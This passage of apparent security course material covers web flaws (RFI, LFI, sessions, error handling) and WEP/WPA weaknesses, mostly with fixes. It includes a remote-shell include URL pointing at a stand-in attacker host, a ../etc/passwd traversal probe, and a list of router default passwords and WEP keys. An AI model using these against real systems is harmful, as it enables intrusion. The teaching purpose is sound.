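_LEADING_INT = re.compile(r"^\s*[+-]?\d+")


def php_int_cast(raw: str) -> int:
    """Reproduce PHP's (int) cast on a string: leading integer, else 0."""
    match = _LEADING_INT.match(raw)
    return int(match.group()) if match else 0


def render_form_body(form_value: str) -> str:
    """Fixed version of the body echo above: entity-encode before output."""
    return "<html><body>" + html.escape(form_value, quote=True) + "</body></html>"


def render_blog_view(raw_id: str) -> str:
    """Fixed version of the id echo: the value is a number or 0, never markup."""
    return "you are viewing " + str(php_int_cast(raw_id)) + " blog"


def render_search_box(query: str) -> str:
    """Attribute context: quotes must be encoded too, or the value could end the attribute."""
    return '<input type="text" name="q" value="' + html.escape(query, quote=True) + '">'


def encoded_user_part(rendered: str) -> str:
    """Strip the fixed wrapper so only the user-controlled portion is inspected."""
    return rendered.removeprefix("<html><body>").removesuffix("</body></html>")


def contains_active_markup(fragment: str) -> bool:
    """Check used for review: is a tag bracket or a quote still literal in the fragment?"""
    return any(ch in fragment for ch in ("<", ">", '"', "'"))
```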

Malicious File Inclusion - RFI

Malicious file execution vulnerabilities are found in many applications. Developers will
often directly use or concatenate potentially hostile input with file or stream functions, or
improperly trust input files. On many platforms, frameworks allow the use of external object
references, such as URLs or file system references. When the data is insufficiently checked,
this can lead to arbitrary remote and hostile content being included, processed or invoked
by the web server.

Business Impact of RFI

This allows attackers to perform:
Remote code execution
Remote rootkit installation and complete system compromise
Remote shell installation
Remote modification and deletion of files on the server
RFI (Remote File Inclusion)

If allow_url_include is on in php.ini, we can inject a shell directly.

You only need to load by GET or POST directly to an URI with the shell (using a
non PHP extension):

Like http://www.techdefence.com/index.php5page=news.php

Now if the Index.php has Remote File Inclusion like

<?php

include($_GET[page]);

?>

So the above URL is written like

http://www.techdefence.com/index.php5page=http://www.evilscript.com/shell.txt

Fixing RFI

Practice secure coding techniques: never pass user input to include(), require() or
their _once variants. Let the request parameter select an entry from a fixed
allow-list of pages and include the file named by that entry.

Moving the parameter from $_GET to $_POST does not help; an attacker controls the body
of a POST request as easily as a query string.

Set allow_url_include = Off (and allow_url_fopen = Off where the application does not
need it) in php.ini.

Filter all pages and set file permissions correctly so that the web server user can
read only what it needs.

Restrict the PHP process with open_basedir and disable_functions. PHP's Safe Mode was
once recommended for this, but it was deprecated in PHP 5.3 and removed in 5.4, so do
not rely on it.

Disallow unused commands and interpreters in the Linux environment.

Insecure Direct Object Reference / LFI (Local File Inclusion)

A direct object reference occurs when a developer exposes a reference to an internal
implementation object, such as a file, directory, database record, or key, as a URL
or form parameter.

An attacker can manipulate direct object references to access other objects without
authorization, unless an access control check is in place.

Insecure Direct Object Reference

Websites often use an include() system to display their pages, and very often this
system is insecure.

A practical example, index.php:

    <?php
    include($_GET['page']);
    ?>

which would result in a website with links such as

index.php?page=about.php
index.php?page=news.php

The simplest way to see if a script is vulnerable to local file inclusion is this:

index.php?page=../../../../../../../../../etc/passwd

If it works, the response shows the list of accounts on that server, with their home
directories and login shells.

Each ../ causes the script to move up one directory; enough of them move it to the top
level directory (/, the root of the filesystem), and /etc/passwd is the Unix account
file. (The password hashes themselves live in /etc/shadow, which the web server user
normally cannot read; /etc/passwd is used as the probe because it is world-readable
and its contents are easy to recognise.)

The result is

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
... and so on.

Fixing Insecure Direct Object Reference

Avoid exposing your private object references to users whenever possible, such as
primary keys or filenames; use an indirect reference (an index into a per-user or
per-session map) instead.

Verify authorization to all referenced objects on every request.
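Both the RFI and the LFI fixes above come down to one rule: the value of page must
never be used as a path. The following is an added example in Python, not from the
course material (the page's own code is PHP), that shows the two ways to enforce it:
an allow-list that maps a page key to a file, which is also an indirect object
reference since the real filename never leaves the server, and a fallback containment
check for cases where a filename must be accepted. PAGES_DIR, the allow-list entries
and the attacker inputs are assumptions; nothing is read from disk, only the decision
is shown.

```python
import posixpath
from urllib.parse import urlsplit

PAGES_DIR = "/var/www/app/pages"                          # assumed include directory
ALLOWED_PAGES = {"about": "about.php", "news": "news.php"}  # assumed allow-list


class IncludeRejected(ValueError):
    """Raised when the request parameter must not reach include()."""


def resolve_vulnerable(page):
    """The page's include($_GET['page']) with no check: whatever was sent is used,
    so ../../etc/passwd (LFI) and http://attacker/shell.txt (RFI) both go through."""
    return page


def resolve_by_allowlist(page):
    """Preferred fix: the parameter is a key into a fixed table, never a path."""
    try:
        return posixpath.join(PAGES_DIR, ALLOWED_PAGES[page])
    except KeyError:
        raise IncludeRejected("unknown page: %r" % page) from None


def resolve_by_containment(page):
    """Fallback when a filename must be accepted. Rejects URLs and PHP stream
    wrappers (http:, ftp:, php:, data:), NUL bytes, and any path that normalises
    to a location outside PAGES_DIR. posixpath.normpath does not follow symlinks;
    on a real filesystem do the same comparison with os.path.realpath."""
    if "\x00" in page:
        raise IncludeRejected("NUL byte in page name")
    if urlsplit(page).scheme:
        raise IncludeRejected("remote or wrapper URL: %r" % page)
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page))
    if candidate == PAGES_DIR:
        raise IncludeRejected("no file named")
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        raise IncludeRejected("path escapes %s: %r" % (PAGES_DIR, candidate))
    return candidate


def accepted(resolver, page):
    """True if the resolver would let this value reach include()."""
    try:
        resolver(page)
        return True
    except IncludeRejected:
        return False
```

Note that posixpath.join() discards PAGES_DIR entirely when page is an absolute path
such as /etc/passwd, which is exactly why the containment check compares the
normalised result against the base directory instead of trusting the join.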

Information Leakage and Improper Error Handling

Applications can unintentionally leak information about their configuration or
internal workings, or violate privacy, through a variety of application problems.

Applications can also leak internal state via how long they take to process certain
operations or via different responses to differing inputs, such as displaying the same
error text with different error numbers (which lets an attacker tell, for example, a
wrong password from an unknown username).

Web applications will often leak information about their internal state through
detailed or debug error messages.

Improper Error Handling

Many security mechanisms fail open:

isAuthenticated()

isAuthorized()

isValid()

Bad logic (i.e., fail open): the fall-through result is "allow", so an exception, an
unexpected return value, or a later edit that adds a path all end in access.

    if (!security_test())
        then return false
    return true

Good logic (i.e., fail secure): the fall-through result is "deny", and only an explicit
positive test grants access.

    if (security_test())
        then return true
    return false
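The two pseudocode fragments above differ only in which outcome is the default. The
following added example in Python, not from the course material, runs both against a
simulated directory lookup that can fail, which is where fail-open logic bites in
practice, and adds an error handler of the kind the information leakage discussion
calls for: the detail goes to the server log under a reference id and the client sees
only the id. The role table, the backend and its outage are constructed for the
demonstration.

```python
import logging
import uuid

log = logging.getLogger("authz")

# Constructed policy: which role may call which business function.
POLICY = {"admin": {"export_users", "view_report"}, "user": {"view_report"}}


def backend_lookup_role(user_id):
    """Simulated directory lookup (constructed): a real one can time out."""
    if user_id == "alice":
        return "admin"
    if user_id == "bob":
        return "user"
    if user_id == "outage":
        raise ConnectionError("directory unavailable")
    return None  # unknown user


def is_authorized_fail_open(user_id, function):
    """The page's bad logic: only the explicit negative path denies. A 'handled'
    exception and an unknown role both fall through to the final 'return True'."""
    try:
        role = backend_lookup_role(user_id)
        if role in POLICY and function not in POLICY[role]:
            return False
    except ConnectionError as exc:
        log.error("authz backend failed: %s", exc)   # logged... and then allowed
    return True


def is_authorized_fail_secure(user_id, function):
    """The page's good logic: the default answer is deny. Only an explicit positive
    test returns True, and every exception lands on the deny path."""
    try:
        role = backend_lookup_role(user_id)
        if role in POLICY and function in POLICY[role]:
            return True
    except ConnectionError as exc:
        log.error("authz backend failed: %s", exc)
    return False


def error_response(exc):
    """Log the full exception server-side under a reference id and return only that
    id to the client: no message text, stack trace, SQL or file path leaves the box."""
    ref = uuid.uuid4().hex[:12]
    log.error("ref=%s %s: %s", ref, type(exc).__name__, exc)
    return {"error": "An internal error occurred.", "ref": ref}
```

The interesting cases are "outage" and an unknown user: the fail-open version grants
export_users to both, the fail-secure version denies both, while legitimate users get
the same answers from either.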

Broken Authentication & Session Management

Proper authentication and session management is critical to web application security.

Flaws in this area most frequently involve the failure to protect credentials and
session tokens throughout their lifecycle.

Business Impact of BA & SM

An attacker can:

Hijack user accounts

Hijack administrative accounts

Undermine authorization and accountability controls

Cause privacy violations

Fixing BA & SM

Use only the framework's built-in session management mechanism; do not invent your own
session identifiers.

Use a single authentication mechanism.

Do not allow the login process to start from an unencrypted page; the whole login flow,
and every page that carries the session cookie, should be served over HTTPS.

Ensure that every page has a logout link, and that logout invalidates the session on
the server.

Use a timeout period, and issue a new session identifier after a successful login.

Do not expose any session identifiers or any portion of valid credentials in URLs or
logs.
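To make the list above concrete, here is an added example in Python, not from the
course material, of the session-handling rules it gives: identifiers from a CSPRNG,
rotation at login, an idle timeout, server-side logout, and a cookie rather than a URL
parameter. The store is in memory and the clock is injected so the timeout can be
exercised without waiting; IDLE_TIMEOUT and the cookie name are assumed values.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60   # seconds of inactivity before a session dies (assumed policy)


class SessionStore:
    """Minimal server-side session table keyed by an unguessable identifier."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # session id -> {"user": ..., "last_seen": ...}

    def _new_id(self):
        # 32 bytes from the OS CSPRNG: never a counter, username or hash of the time.
        return secrets.token_urlsafe(32)

    def start_anonymous(self):
        """Pre-login session (shopping cart, CSRF token, ...)."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def login(self, sid, user):
        """Rotate the identifier when privilege changes. An attacker who planted the
        old id in the victim's browser (session fixation) is left holding a dead id."""
        old = self._sessions.pop(sid, None)
        if old is None:
            raise KeyError("unknown session")
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "last_seen": self._clock()}
        return new_sid

    def user_for(self, sid):
        """Returns the logged-in user, or None if the session is unknown, anonymous
        or idle too long. Expired entries are deleted so the id cannot be revived."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        if now - session["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, sid):
        """Logout must remove the server-side entry, not just clear the cookie."""
        self._sessions.pop(sid, None)

    def active_count(self):
        return len(self._sessions)


def session_cookie_header(sid):
    """HttpOnly keeps the id away from script (the XSS section above), Secure keeps
    it off cleartext HTTP, SameSite limits cross-site sending. Putting the id in a
    URL instead would copy it into server logs, browser history and Referer headers."""
    return "Set-Cookie: SESSIONID=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % sid
```

With a controllable clock the timeout is easy to check: advance it past IDLE_TIMEOUT
and user_for() returns None and forgets the session, exactly as a real deployment
should after a user walks away from a shared machine.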

Failure to Restrict URL Access

Frequently, the only protection for a URL is that links to that page are not presented
to unauthorized users.

However, a motivated, skilled, or just plain lucky attacker may be able to find and
access these pages, invoke functions, and view data.

Fixing Failure to Restrict URL Access

Ensure the access control matrix is part of the business, architecture, and design of
the application.

Ensure that all URLs and business functions are protected by an effective access
control mechanism that denies by default.

Pay close attention to include/library files; they should not be reachable as URLs at
all.

Do not assume that users will be unaware of special or hidden URLs or APIs.

Keep anti-virus protection and patches for the web server, framework and libraries up
to date.

2.5 Security Guidelines

1. Validate Input and Output
2. Fail Securely (Closed)
3. Keep it Simple
4. Use and Reuse Trusted Components
5. Defence in Depth
6. Only as Secure as the Weakest Link
7. Security by Obscurity Won't Work
8. Least Privilege
9. Compartmentalization (Separation of Privileges)

Validate Input & Output

All user input and all output to the user should be checked to ensure it is both
appropriate and expected.

Allow only explicitly defined characteristics and drop all other data.

Fail Securely

When it fails, it fails closed.

It should fail to a state that rejects all subsequent security requests.

A good analogy is a firewall. If a firewall fails, it should drop all subsequent
packets.

Keep It Simple

If a security system is too complex for its user base, it will either not be used or
users will try to find ways to bypass it.

This applies equally to the tasks that an administrator must perform in order to
secure an application.

It also applies to the security-layer APIs that application developers must use to
build the system.

Use & Reuse Trusted Components

Using and reusing trusted components makes sense both from a resource stance and from
a security stance.

When someone else has proven they got it right, take advantage of it.

Defence in Depth

Relying on one component to perform its function 100% of the time is unrealistic.

While we hope to build software and hardware that works as planned, predicting the
unexpected is difficult. Good systems don't predict the unexpected, but plan for it.

Only as Secure as the Weakest Link

Careful thought must be given to what one is securing.

Attackers are lazy and will find the weakest point and attempt to exploit it.

Security by Obscurity Won't Work

It's naive to think that hiding things from prying eyes doesn't buy some amount of
time.

But this strategy doesn't work in the long term and has no guarantee of working in the
short term.

Least Privilege

Systems should be designed in such a way that they run with the least amount of system
privilege they need to do their job.

Compartmentalization (Separation of Privileges)

Compartmentalizing users, processes and data helps contain problems if they do occur.

Compartmentalization is an important concept widely adopted in the information
security realm.


CHAPTER 3

Wireless Hacking & Security

3.1 Wireless Standards
3.2 WEP & WPA Summary
3.3 Cracking WEP & WPA


3.1 Wireless Standards

Wireless networking technology is becoming increasingly popular but at the same time
has introduced many security issues. The popularity of wireless technology is driven
by two primary factors, convenience and cost. A wireless local area network (WLAN)
allows workers to access digital resources without being tied to their desks. Laptops
can be carried into meetings or even into a Starbucks cafe and tap into the wireless
network. This convenience has become affordable.

Wireless LAN standards are defined by the IEEE's 802.11 working group. WLANs come in
three flavors:

802.11b

Operates in the 2.4000 to 2.4835 GHz frequency range and can operate at up to 11
megabits per second.

802.11a

Operates in the 5.15-5.35 GHz and 5.725-5.825 GHz frequency ranges and can operate at
up to 54 megabits per second.

802.11g

Operates in the same 2.4 GHz frequency range as 802.11b but uses OFDM modulation, so
it can operate at up to 54 megabits per second while staying backward compatible with
802.11b equipment.

When setting up a WLAN, the channel and service set identifier (SSID) must be
configured in addition to traditional network settings such as IP address and subnet
mask.

The channel is a number between 1 and 11 (1 and 13 in Europe) and designates the
frequency on which the network will operate.


The SSID is an alphanumeric string that differentiates networks operating on the same
channel. It is essentially a configurable name that identifies an individual network.
These settings are important factors when identifying WLANs and sniffing traffic.

SSIDs

The SSID is an identifier that wireless networking devices use to establish and
maintain wireless connectivity. It is sometimes treated as a shared secret between
access points and clients, but it provides no real protection, since it is sent in the
clear in beacons, probe responses and association requests. Security concerns arise
when the default values are not changed, because a default SSID tells an attacker the
vendor and often the default administrative password. In the non-secure access mode
the access point allows clients to connect using the configured SSID, a blank SSID, or
an SSID configured as "any".

Attacker's point of view:

If the target access point responds to a broadcast SSID probe, the attacker may just be
in luck. Most wireless card drivers are configured with an SSID of ANY so that they can
associate with any available wireless network. When the SSID is set to ANY, the driver
sends a probe request to the broadcast address with a zero-length SSID, and most access
points that accept such requests respond with their SSID and network information. This
configuration makes things easier for the user, who does not have to remember the SSID
to connect to the wireless LAN, but it makes it much simpler for attackers to gather
SSIDs. Some of the common default SSIDs and passwords are:
3Com AirConnect 2.4 GHz DS (newer 11 Mbit, Harris/Intersil Prism based)
    Default SSID: 'comcomcom'

3Com other Access Points
    Default SSID: '3com'

Addtron (Model: ?)
    Default SSID: 'WLAN'

Cisco Aironet 900 MHz/2.4 GHz BR1000/e, BR5200/e and BR4800
    Default SSID: 'tsunami'; '2'
    Console port: no default password
    Telnet password: no default password
    HTTP management: on by default, no default password

Apple AirPort
    Default SSID: 'AirPort Network'; 'AirPort Netzwerk'

BayStack 650/660 802.11 DS AP
    Default SSID: 'Default SSID'
    Default admin password: <none>
    Default channel: 1
    MAC address: 00:20:d8:XX:XX:XX

Compaq WL-100/200/300/400
    Default SSID: 'Compaq'

D-Link DL-713 802.11 DS Access Point
    Default SSID: 'WLAN'
    Default channel: 11
    Default IP address: DHCP-administered

Intel PRO/Wireless 2011 802.11 DSSS - PC Card
    Default SSID: '101'; 'xlan'; 'intel'; '195'
    Default channel: 3

Intel PRO/Wireless 2011 802.11 DSSS - Access Point
    Default SSID: '101'; '195'

Linksys WAP-11 802.11 DS Access Point
    Default SSID: 'linksys'
    Default channel: 6
    Default WEP key one: 10 11 12 13 14 15
    Default WEP key two: 20 21 22 23 24 25
    Default WEP key three: 30 31 32 33 34 35
    Default WEP key four: 40 41 42 43 44 45

Linksys WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card
    Default SSID: 'linksys'; 'Wireless'
    Default channel: 3; 6; 11

Netgear 802.11 DS ME102 / MA401
    Default SSID: 'wireless'
    Default channel: 6
    Default IP address: 192.168.0.5
    Default WEP: disabled
    Default WEP key 1: 11 11 11 11 11
    Default WEP key 2: 20 21 22 23 24
    Default WEP key 3: 30 31 32 33 34
    Default WEP key 4: 40 41 42 43 44
    Default MAC: 00:30:ab:xx:xx:xx

SMC Access Point Family SMC2652W
    Default SSID: 'WLAN'
    Default channel: 11
    Default HTTP login: user 'default', password 'WLAN_AP'
    Default MAC: 00:90:d1:00:b7:6b (00:90:d1:xx:xx:xx)
    Console port: no password, AT command set

SMC 2526W Wireless Access Point Dual-Dipole
    Default SSID: 'WLAN'
    Default IP: 192.168.0.254
    Default MAC: 00:90:d1:00:11:11 (00:90:d1:xx:xx:xx)
    Default AP name: MiniAP
    Default channel: 11
    Default admin password: MiniAP

SMC 2682W EZ-Connect Wireless Bridge
    Default SSID: 'BRIDGE'
    Default channel: 11
    Default admin password: WLAN_BRIDGE
    Default MAC: 00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx)

SOHOware NetBlaster II
    Default SSID: same as MAC address
    Default MAC: 00:80:c6:xx:xx:xx
    Default channel: 8

Symbol AP41x1 and LA41x1 / LA41x3 802.11 DS
    Default SSID: '101'
    Default MAC: 00:a0:0f:xx:xx:xx
    Default WEP key one: 10 11 12 13 14 15
    Default WEP key two: 20 21 22 23 24 25
    Default WEP key three: 30 31 32 33 34 35
    Default WEP key four: 40 41 42 43 44 45

Teletronics WL-Access Point
    Default SSID: 'any'
    Default password: 1234
    Console port: no password, AT command set

WaveLAN family
    Default SSID: 'WaveLAN Network'
    Default channel: 3

ZCOMAX Access Point XWL450
    Default SSID: 'any'; 'mello'; 'Test'
    Default password: 1234
    Console port: no password, AT command set

ZyXEL Prestige 316 Gateway/NAT box/Wireless Bridge
    Default SSID: 'Wireless'
    Default channel: 1
    Default console password: 1234
    Default telnet password: 1234
    Console port: same password for the system, ANSI/VT100 terminal

1stWave Access Points
    Default SSID: '1stWave'

ELSA LANCOM Wireless L-11 / AirLancer
    Default SSID: 'ELSA'


3.2 WEP & WPA Summary

WEP

WEP (Wired Equivalent Privacy) is a component of the IEEE 802.11 WLAN standard. Its
primary purpose is to provide confidentiality for data on wireless networks at a level
equivalent to that of wired LANs. Wired LANs typically employ physical controls to
prevent unauthorized users from connecting to the network and viewing data. In a
wireless LAN the network can be accessed without physically connecting to it, so the
IEEE chose to employ encryption at the data link layer to prevent unauthorized
eavesdropping. This is accomplished by encrypting data with the RC4 stream cipher,
using a per-packet key formed from a 24-bit initialization vector (IV) prepended to
the shared 40- or 104-bit key.

Deficiencies of WEP

The IV is too short (24 bits, so only about 16.7 million values) and nothing protects
it from reuse; reusing an IV reuses the RC4 keystream.

The per-packet key is constructed directly from the IV, making it susceptible to
weak-key attacks (the FMS attack and its successors).

No effective integrity check: the CRC-32 ICV is linear, so an attacker can flip bits
in a ciphertext and fix up the checksum without knowing the key.

No built-in provision to update the key on all wireless clients connected to the
access point.

No protection against message replay.

WPA and WPA2

WPA stands for Wi-Fi Protected Access. It was published by the Wi-Fi Alliance as an
interim subset of the IEEE 802.11i draft; its Enterprise mode uses IEEE 802.1X for
authentication. WPA keeps the RC4 stream cipher but uses a 128-bit key and a 48-bit IV
under TKIP (Temporal Key Integrity Protocol), which derives a fresh key for every
packet, together with the Michael message integrity code (MIC) to ensure data
integrity. WPA2 is the full 802.11i standard and replaces RC4/TKIP with AES in CCMP
mode.
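The first WEP deficiency listed above, IV reuse, is the one most easily shown in code.
The following added example in Python, not from the course material, implements RC4
and the WEP per-packet key construction (24-bit IV prepended to the shared key, IV sent
in the clear; the CRC-32 ICV is left out) and then encrypts two constructed frames
under the same IV: XORing the two ciphertexts cancels the keystream, and one known
plaintext reveals the other without the key. The key, the IV and the frame contents
are made up for the demonstration.

```python
def rc4_keystream(key, length):
    """RC4: key-scheduling algorithm (KSA) followed by the output generator (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, key, plaintext):
    """WEP data encryption: per-packet RC4 key = IV || shared key. The 24-bit IV is
    carried unencrypted in the frame header, so it is returned with the ciphertext."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv, xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))


def recover_other_plaintext(c1, c2, p1):
    """Two frames under the same IV share a keystream K: c1 ^ c2 == (p1 ^ K) ^ (p2 ^ K)
    == p1 ^ p2. Knowing p1 (a fixed LLC/SNAP header, an ARP reply the attacker
    provoked, a file the attacker sent to the victim) yields p2 with no key at all."""
    return xor_bytes(xor_bytes(c1, c2), p1)


IV_SPACE = 1 << 24   # sequential IVs wrap after this many frames; random IVs
                     # collide after roughly 2**12 frames by the birthday bound


def demo_iv_reuse():
    """Constructed scenario: 40-bit key, one IV used for two frames. Returns the
    plaintext recovered for the second frame and the real one for comparison."""
    key = b"\x01\x02\x03\x04\x05"                           # shared key (made up)
    iv = b"\x00\x00\x2a"
    # LLC/SNAP header + ARP: something the attacker can know or provoke.
    p1 = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"ARP reply 10.0.0.1 is-at 00:11:22:33:44:55"
    # LLC/SNAP header + IP: the victim's secret traffic.
    p2 = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"POST /login user=admin pw=s3cret"
    _, c1 = wep_encrypt(iv, key, p1)
    _, c2 = wep_encrypt(iv, key, p2)
    recovered = recover_other_plaintext(c1, c2, p1)
    return recovered, p2[:len(recovered)]
```

The RC4 implementation can be checked against the published test vector (key "Key",
plaintext "Plaintext" gives BBF316E8D940AF0AD3) before trusting the demonstration;
TKIP's per-packet key mixing and 48-bit sequence counter exist precisely to make the
keystream reuse shown in demo_iv_reuse() impractical.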
3.3 Cracking WEP & WPA

Hacking tool: NetStumbler (http://www.netstumbler.org)

NetStumbler displays:
1. Signal strength
2. MAC address
3. SSID
4. Channel details

NetStumbler is a Windows-based war-driving tool that detects wireless networks and
marks their relative position with a GPS. NetStumbler uses an 802.11 Probe Request
sent to the broadcast destination address, causing all access points in the area to
issue an 802.11 Probe Response containing network configuration information, such as
their SSID and WEP status. When hooked up to a GPS, NetStumbler records a GPS
coordinate for the highest signal strength found for each access point. Using the
network and GPS data, the user can create maps with tools such as Microsoft MapPoint.

AiroPeek (http://www.wildpackets.com)

AiroPeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting
all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. In
addition, AiroPeek quickly isolates security problems, fully decodes the 802.11a and
802.11b WLAN protocols, and analyzes wireless network performance with accurate
identification of signal strength, channel and data rates.

AirSnort (http://airsnort.shmoo.com/)

AirSnort is a wireless LAN (WLAN) tool which recovers WEP encryption keys. AirSnort
operates by passively monitoring transmissions, computing the encryption key when
enough packets have been gathered. AirSnort's original weak-IV (FMS) attack needs
approximately 5-10 million encrypted packets; the later PTW attack (2007, implemented
in aircrack-ng) recovers a 104-bit key from roughly 40,000-85,000 captured frames and
is not stopped by the weak-IV filtering found in newer access points. Once enough
packets have been gathered, the key is computed in under a second.

Kismet

Kismet is an 802.11 wireless network sniffer which separates and identifies the
different wireless networks in the area. Kismet works with any wireless card which is
capable of reporting raw packets (monitor mode).

WEPCrack

WEPCrack is an open source tool for breaking 802.11 WEP secret keys. While AirSnort
has captured the media attention, WEPCrack was the first publicly available code that
demonstrated the weak-IV attack described above.

The current tools are Perl based and are composed of the following scripts:

WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl

Countermeasures:

Do not configure your Wi-Fi router as an unsecured (open) connection; it can be misused
by anyone in range.

ISPs often configure your phone number or mobile number as the default network key in
the router. If so, change it as soon as possible.

If the connection is left unsecured, enable logging. This lets you collect the MAC
(Media Access Control) addresses of the machines that use your Wi-Fi router.

If the connection is left unsecured, install packet capturing or WLAN analysis software
so that you can keep an eye on the machines that use your Wi-Fi router.

If the connection is left unsecured, bind your own MAC addresses to the router so that
only your laptops are allowed to connect. Note that MAC filtering alone is weak: an
attacker can sniff an allowed address and clone it.

Protect your SSIDs, and do not use WEP; if your ISP configures the router, insist on
WPA2.

Do not ever use unknown open networks named "Free internet" or "wifi": such networks
are often set up to steal data from your laptop.

Maintain all types of logs for at least six months.
